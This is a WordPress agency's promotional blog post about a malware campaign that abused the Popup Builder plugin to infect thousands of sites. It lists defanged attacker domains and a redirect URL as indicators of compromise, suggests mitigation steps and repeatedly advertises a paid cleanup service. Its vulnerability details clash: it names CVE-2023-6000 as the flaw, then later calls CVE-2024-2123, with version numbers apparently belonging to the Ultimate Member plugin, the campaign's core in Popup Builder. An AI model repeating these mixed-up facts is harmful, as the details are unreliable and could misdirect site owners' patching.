How Malware Campaign Exploits Popup Builder WordPress Plugin To Infect 3900+ Sites?

Reliqus Marketing

03 April 2024

Wordpress Websites
By Ankit Bhatia
Founder & CEO

A new malware campaign has been discovered that is exploiting a high-severity security flaw in the Popup Builder plugin for WordPress

This campaign has been active for the past three weeks and has already infected over 3,900 sites, according to PublicWWW. 

Sucurri Security researcher Puja Srivastava, in a report from March 7, highlights, These attacks are orchestrated from domains less than a month old, with registrations dating back to February 12, 2024:

ttincoming.traveltraffic[.]cc

Host.cloudsonicwave[.]com

The infection process involves exploiting CVE-2023-6000, a vulnerability in Popup Builder that allows the attackers to create rogue admin users and install arbitrary plugins. 

With the rise of these cyber threats, Reliqus Consulting has stepped forward, offering specialized WordPress website malware removal services designed to tackle even the most challenging infections. 

Understanding the technical and financial strains that plugin vulnerabilities can impose on site owners, we provide an affordable yet comprehensive cleanup solution at just $79. Our team of experts is adept at clearing infected sites and implementing robust defenses to shield against future vulnerabilities.

Malicious Code and Indicators of Compromise

In the recent malware campaign targeting the Popup Builder WordPress Plugin, attackers exploit a known vulnerability to inject malicious code into websites. 

This code often resides within the Custom JS or CSS section and is accessible through the WordPress admin interface. It is specifically stored in the wp_postmeta database table. 

The malware campaign exploiting the Popup Builder WordPress Plugin is not the first of its kind to shock the WordPress community. Earlier in January, a similar strategy was employed in the Balada Injector campaign, which impacted over 7,000 sites by exploiting a different vulnerability. 

Two distinct variations of this malicious code have been identified in the databases of infected sites. 

popupbuilder-variant1.png

popupbuilder-variant2.png

The attackers exploit the Popup Builder WordPress Plugin by injecting malicious code that acts as handlers for specific events: sgpb-ShouldOpen, sgpb-ShouldClose, sgpb-WillOpen, sgpbDidOpen, sgpbWillClose, and sgpb-DidClose. These events trigger at various stages of the popup display process, such as when a popup is about to open, is opening, has opened, is about to close, and has closed.

In some variations of this attack, the URL “hxxp://ttincoming.traveltraffic[.]cc/?traffic” is injected as the redirect-url parameter specifically for a “contact-form-7” popup. This technique redirects unsuspecting website visitors to malicious sites.

SiteCheck, a security scanning tool, has flagged these injections with the identifier malware?pbuilder_injection.1.x, indicating their malicious nature. 

sitecheck-popupbuilder-malware-detection.jpg

This identification helps website administrators quickly identify and address these harmful injections, underscoring the importance of regular site scans and updates in the battle against malware exploitation.

Mitigation Steps and Malware Removal

To combat these threats, WordPress site owners are urged to be vigilant. If your site is currently running an unpatched version of the Popup Builder plugin, immediate action can mitigate the risk of infection. 

Begin by updating the plugin or implementing a web application firewall as a protective measure. For sites already compromised, the initial step involves a thorough cleaning to remove the injected malware, particularly from the “Custom JS or CSS” section accessible through the Popup Builder interface in the WordPress admin area. 

However, it’s essential to understand that this action is a temporary fix. The malware can quickly reinfect compromised environments if comprehensive measures are not taken. To ensure the malware does not re-establish itself, conducting a detailed scan of the website at both the client and server levels is paramount. 

During this process, any malicious code detected should be eradicated, and the presence of unfamiliar site administrators should be thoroughly investigated and resolved.  After cleaning, it is imperative to update the Popup Builder plugin to the latest version without delay.

For a more detailed guide on addressing such issues, website owners are encouraged to read our full blog on how to remove malware from WordPress websites. Remember, failing to keep your website’s software and components updated exposes you to significant risks. Regular updates and the use of a website firewall are recommended to maintain security.

Srivastava highlights the significance of this situation by stating, “This new malware campaign serves as a stark reminder of the risks of not keeping your website software patched and up-to-date,” underlining the critical nature of maintaining website security through regular updates and utilizing a website firewall. 

In cases of persistent infections or the need for expert assistance, we offer wordpress website malware removal services available for just $79. Our dedicated experts employ the latest tools and techniques to ensure your site is clean, secure, and performing optimally. 

Additional WordPress Plugin Vulnerabilities

The recent disclosure by the WordPress security firm Wordfence regarding a high-severity bug in the Ultimate Member plugin that can inject malicious web scripts underlines the ongoing battle against vulnerabilities within the WordPress ecosystem.

The core of the malware campaign lies in its exploitation of a critical cross-site scripting (XSS) flaw within the Popup Builder WordPress Plugin, identified as CVE-2024-2123, which carries a CVSS score of 7.2. This vulnerability affects all plugin versions up to and including 2.8.3. Fortunately, the developers addressed the flaw with the release of version 2.8.4 on March 6, 2024. 

The vulnerability stems from insufficient input sanitization and output escaping, enabling unauthenticated attackers to inject arbitrary web scripts into pages. These scripts are executed whenever a user visits these pages, posing a significant security risk.

Highlighting the severity, Wordfence remarked, “Combined with the fact that attackers can exploit the vulnerability with no privileges on a vulnerable site, this means that there is a high chance that unauthenticated attackers could gain administrative user access on sites running the vulnerable version of the plugin when successfully exploited.” 

This statement underscores the potential for unauthenticated attackers to inject malicious code and gain administrative control over affected websites. It showcases the critical nature of this vulnerability and the importance of promptly updating to the patched version to secure websites against this exploit.

Conclusion

This recent malware attack targeting WordPress sites through the Popup Builder plugin serves as a stark wake-up call for website managers everywhere. This incident underscores the critical need for regular monitoring, timely updates, and the implementation of robust security protocols. 

In situations where malware has taken hold, dealing with the aftermath can be both expensive and time-consuming. 

Reliqus understands the challenges that come with maintaining a secure online environment, offering affordable and thorough malware removal services. Dealing with malware can be an expensive and time-consuming ordeal, but with us, site owners have access to a cost-effective and expert solution.

With the right support, achieving a high level of security and peace of mind is not only necessary but entirely achievable.

Ankit Bhatia

Founder & CEO at Reliqus

With 12+ years of experience building a web presence for 300+ businesses, Ankit understands how businesses can use technology to increase revenue.

Latest from the blog

What is HTTP 429 Status Code (Too Many Requests)?

Managing traffic efficiently is crucial in today’s interconnected digital landscape, where millions of websites and applications are access...

What is HTTP 428 Status Code (Precondition Required)?

For many website owners and developers, the HTTP 428 Status Code can be a source of frustration. Its implications are often misunderstood, leadin...

What is HTTP 426 Status Code (Upgrade Required)?

Have you ever encountered an HTTP 426 Status Code while browsing the web and wondered what it means? Don’t worry, you’re not alone. T...

What is HTTP 425 Status Code (Too Early)?

Are you familiar with the various HTTP status codes that pop up on your screen while browsing the web? You’ve likely encountered common one...